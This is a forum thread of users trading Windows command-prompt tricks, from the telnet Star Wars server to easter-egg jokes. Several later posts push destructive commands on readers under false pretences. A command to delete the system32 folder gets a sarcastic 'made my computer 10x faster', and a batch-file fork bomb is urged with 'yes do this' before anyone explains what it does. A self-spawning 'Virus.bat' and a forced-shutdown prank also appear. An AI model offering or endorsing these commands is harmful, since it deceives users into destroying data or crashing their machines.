There's an easter egg in Windows:
Open cmd and type the following:
telnet towel.blinkenlights.nl
Now you can watch Star Wars (ASCII)
[QUOTE=Panda X;20108559]There's an easter egg in Windows:
Open cmd and type the following:
telnet towel.blinkenlights.nl
Now you can watch Star Wars (ASCII)[/QUOTE]
Don't even get me started. THAT IS NOT AN EASTER EGG IN WINDOWS! IT'S A FRIGGIN TELNET SERVER FOR THE LOVE OF GOD!
[QUOTE=Xeon06;20108638]Don't even get me started. THAT IS NOT AN EASTER EGG IN WINDOWS! IT'S A FRIGGIN TELNET SERVER FOR THE LOVE OF GOD![/QUOTE]
lol
[QUOTE=Xeon06;20108638]Don't even get me started. THAT IS NOT AN EASTER EGG IN WINDOWS! IT'S A FRIGGIN TELNET SERVER FOR THE LOVE OF GOD![/QUOTE]
this is the joke: *
this is your head: O
notice the position of the joke and that of your head
[img]http://imgkk.com/i/pcGwq_.png[/img]
don't mind me, just looking at these windows easter eggs.
I'm sure a lot of people are gonna start posting things like pingging a website, but I don't think that counts as a hack -_-
you can forge emails though :D
[media]http://www.youtube.com/watch?v=IEmdiFbKKmE[/media]
You can also fake a windows 9x bluescreen with the right code.
[QUOTE=reapaninja;20108710]this is the joke: *
this is your head: O
notice the position of the joke and that of your head[/QUOTE]
damn beat me to it
[QUOTE=ButtsexV2;20109217]You can also fake a windows 9x bluescreen with the right code.[/QUOTE]
It's not fake. It's an error in the filesystem code.
[QUOTE=Xeon06;20108638]Don't even get me started. THAT IS NOT AN EASTER EGG IN WINDOWS! IT'S A FRIGGIN TELNET SERVER FOR THE LOVE OF GOD![/QUOTE]
msg * Hello %username%, this is not a telnet server.
No don't replace %username% with your username. It's an environment variable.
[QUOTE=ButtsexV2;20108903][img]http://imgkk.com/i/pcGwq_.png[/img]
don't mind me, just looking at these windows easter eggs.[/QUOTE]
idk if it is true, but if you watch it from a ipv6 addresse, they say it is in color.
[QUOTE=Nisd;20117545]idk if it is true, but if you watch it from a ipv6 addresse, they say it is in color.[/QUOTE]
You might be correct actually.
[QUOTE=Panda X;20113722]It's not fake. It's an error in the filesystem code.[/QUOTE]
Which way to trigger it are you talking about? The only one I know involves a key called "CrashOnSomething" so it sure sounds like a bug they purposely saved aside for test purposes to me.
[QUOTE=gparent;20121176]Which way to trigger it are you talking about? The only one I know involves a key called "CrashOnSomething" so it sure sounds like a bug they purposely saved aside for test purposes to me.[/QUOTE]
con/con or aux/aux or etc/etc (etc meaning other reserved file names)
Oh, I didn't know that used to crash.
[QUOTE=Nisd;20117545]idk if it is true, but if you watch it from a ipv6 addresse, they say it is in color.[/QUOTE]
Did ipv6 even exist back then?
[QUOTE=Ezhik;20139664]Did ipv6 even exist back then?[/QUOTE]
It's not like they can't update it.
But either way, IPv6 or IPv4 wouldn't change the color. They'd need software to accomplish that (by detecting if the inbound connection is v4 or v6, and replying back with the appropriate data).
[QUOTE=Eddiesax;20108388]does anyone have any cool unique cmd tricks? [highlight]jw[/highlight][/QUOTE]
What does jw mean?
Probably a dumb shorthand for "Just wondering".
Surprisingly, no one have said "del %windir%/system32" yet
del %windir%/system32
[QUOTE=Jizzers;20141149]del %windir%/system32[/QUOTE]
This one is awesome!
Made my computer 10x faster!!
Three lines in cmd:
CD %USERPROFILE%
ECHO ^%0^|^%0 >> lol.bat
lol.bat
[QUOTE=Roast Beast;20141470]Three lines in cmd:
CD %USERPROFILE%
ECHO ^%0^|^%0 >> lol.bat
lol.bat[/QUOTE]
yes do this
[editline]08:18PM[/editline]
alternatively put
[code]%0|%0[/code]
in a batch file and run it
[code]@echo off
Title Virus
start Virus.bat[/code]
Omg virus!
[editline]01:18PM[/editline]
[code]shutdown -s -t 10 -c "Virus!"[/code]
[QUOTE=Yumyumbublegum;20141492]yes do this
[editline]08:18PM[/editline]
alternatively put
[code]%0|%0[/code]
in a batch file and run it[/QUOTE]
I just did this.
In a virtual machine.
What does it do?
[QUOTE=JJ Webby;20143101]What does it do?[/QUOTE]
[url=http://en.wikipedia.org/wiki/Fork_bomb]Fork bomb.[/url]
Sorry, you need to Log In to post a reply to this thread.